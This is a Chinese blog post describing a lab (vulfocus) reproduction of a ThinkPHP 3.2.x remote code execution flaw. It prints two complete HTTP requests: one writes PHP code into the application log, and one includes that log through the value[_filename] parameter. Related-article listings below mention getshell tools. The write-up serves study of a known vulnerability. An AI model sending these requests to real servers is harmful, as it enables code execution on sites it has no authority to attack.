vulfocus——thinkphp3.2.x代码执行

最新推荐文章于 2024-01-16 10:12:05 发布
最新推荐文章于 2024-01-16 10:12:05 发布
阅读量1.9k 收藏 2
点赞数 1
分类专栏: vulfocus复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62063669/article/details/127135202
版权

描述

ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。 

复现

1.在默认的日志路径中包含执行PHP代码,数据包如下:

GET /index.php?m=--><?=phpinfo();?> HTTP/1.1
Host: 123.58.224.8:60413
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; _xsrf=2|acaadd94|c0a162aa3fd2e931e6cd588feb40d74a|1664445801; PHPSESSID=ckges7c8h7lhanhuea3ppd1o40
Upgrade-Insecure-Requests: 1

 

2./index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_10_01.log

22_10_01是复现的日期,根据自己的时间做调整

GET /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_10_01.log HTTP/1.1
Host: 123.58.224.8:60413
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; _xsrf=2|acaadd94|c0a162aa3fd2e931e6cd588feb40d74a|1664445801; PHPSESSID=ckges7c8h7lhanhuea3ppd1o40
Upgrade-Insecure-Requests: 1

 

隐身的菜鸟
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp3.2.x 代码执行
qq_17622203的博客
03-21 3081
1.因为是靶场,所以没有waf之类的东西,也就不涉及到绕过,免杀之类的操作。 2.文中红色的字体是要注意根据实际情况写的。 3.mysql写shell的几种方法:写入mysql_通过MySQL写入webshell的几种方式_weixin_39872872的博客-CSDN博客 Log记录目录:若开启debug模式日志会到:\Application\Runtime\Logs\Home\下若未开启debug模式日志会到:\Application\Runtime\Logs\Common\下 访问页面时抓包,
vulfocus thinkphp-3.2.x
A1bewhy的博客
03-23 3940
readme 1、参考:【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 (qq.com) 2、.log文件命名方式为 yy_mm_dd.log (yy为年,mm为月,dd为日) 3、重开了几次环境,所以截图混乱,但是步骤和方法可行 4、如果解题过程1不可行,可尝试解题过程2 解题过程1 1、访问网址,抓包,改数据包 2、访问\Application\Runtime\Logs\Common\yy_mm_dd.log(其中,yy为年,mm为月,dd为日) 3、构造请求攻击 htt
ThinkPHP 3.2.x RCE漏洞复现
qq_43697234的博客
07-20 7065
ThinkPHP 3.2.x RCE漏洞复现 漏洞介绍 ThinkPHP3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。 漏洞复现 复现环境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10 一、 搭建环境: 在ThinkPHP的Application\Home\Controller\IndexController.class.php 目录
ThinkPHP3.2.x 代码执行漏洞
guishengyx的博客
10-19 1824
vulfocus靶场
【漏洞复现-thinkphp-命令执行vulfocus/thinkphp-3.2.x
10-14 2197
thinkphp-命令执行】日志包含
ThinkPHP3.2.x RCE
LYJ20010728的博客
08-03 1102
ThinkPHP3.2.x RCE下载地址漏洞利用代码分析 下载地址 戳此进行下载 漏洞利用 debug模式开启 代码分析 程序执行流程 5
ThinkPHP3.2.x (SQL注入&文件读取)反序列化POP链
LYJ20010728的博客
08-10 786
ThinkPHP3.2.x(SQL注入&文件读取)反序列化POP链初始配置漏洞利用漏洞分析POP链分析POP链构造漏洞利用参考文章 初始配置 这里利用ThinkPHP3.2.3做示例,戳此进行下载 php的版本采用PHP5 (PHP7下起的ThinkPHP框架在调用有参函数时不传参数会触发框架里的错误处理) 下载后的源码中,需要对Application/Home/Controller/IndexController.class.php内容进行修改 <?php namespace Hom
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
ThinkPHP3.2项目源码(包含数据库)
11-21
一个使用ThinkPHP3.2的项目实例,供新人学习使用,请勿商用.
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
ThinkPHP_3.2.zip_thinkPHP3.2_thinkphp3.2..3
09-14
1. MVC模式:ThinkPHP3.2采用模型-视图-控制器架构,将业务逻辑、数据处理和界面展示分离,使代码更加清晰,易于维护。 2. 快速路由:强大的路由系统使得URL管理更加灵活,支持动态路由和RESTful风格的API设计。 3. ...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
thinkphp3.2.x新增图片上传缩略图裁剪类
06-26
调用方式很简单 get_sc($cover_id,[$width=180,$height=auto,$cut]) @param $cover_id 图片ID___ @param $width 宽度___ @param $height 高___ @param $cut 是否切割 默认不切割___ 直接返回新图片的url ...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
thinkphp3.2.3 代码执行
weixin_46801402的博客
11-02 1077
thinkphp3.2.3 代码执行
thinkphp 命令行执行
最新发布
xiaopzi的博客
01-16 1462
echo $PATH/root/perl5/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin这里/usr/local/bin优先于/usr/bin。上面的意思是,linux执行任何命令,都会先去/usr/local/sbin,如果没有再去/usr/local/bin下面,如果还没有就去/usr/local/bin,以此类推,如果都没有,就会提示找不到命令。/usr/bin存放一些用户命令,如led(控制LED灯的)。
远程代码执行--ThinkPHP
weixin_44940180的博客
08-20 408
漏洞 漏洞原因是由于框架对控制器名没有进行足够的校验 导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令 受影响的版本包括5.0和5.1版本。 漏洞影响范围 Thinkphp 5.1.0 - 5.1.31 Thinkphp 5.0.5 - 5.0.23 漏洞复现 通过phpinfo函数写出phpinfo()的信息 http://localhost/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE)漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完全控制权限。 这个漏洞的原因是在ThinkPHP 3.2.x版本的核心代码中没有对用户的输入进行充分的过滤和校验。攻击者可以利用这个漏洞来执行各种恶意操作,比如上传恶意文件、修改数据库内容或者获取系统敏感信息等。 为了利用这个漏洞,攻击者需要构造一个特殊的请求,其中包含可执行的系统命令。然后将这个请求发送到受影响的应用程序的漏洞点上。当应用程序在处理这个请求时,会将其中的系统命令当作可执行代码执行,最终导致攻击者获取对应用服务器的控制权限。 为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架。在最新版本中,开发者已经修复了这个漏洞,并加强了对用户输入的过滤和校验。此外,用户还可以根据自己的需求对应用程序进行进一步的安全加固,比如限制上传文件的类型和大小,对用户输入进行严格的过滤和校验等。 总之,ThinkPHP 3.2.x版本存在远程命令执行漏洞,攻击者可以通过构造恶意请求来执行任意的系统命令。为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架,并加强应用程序的安全加固措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值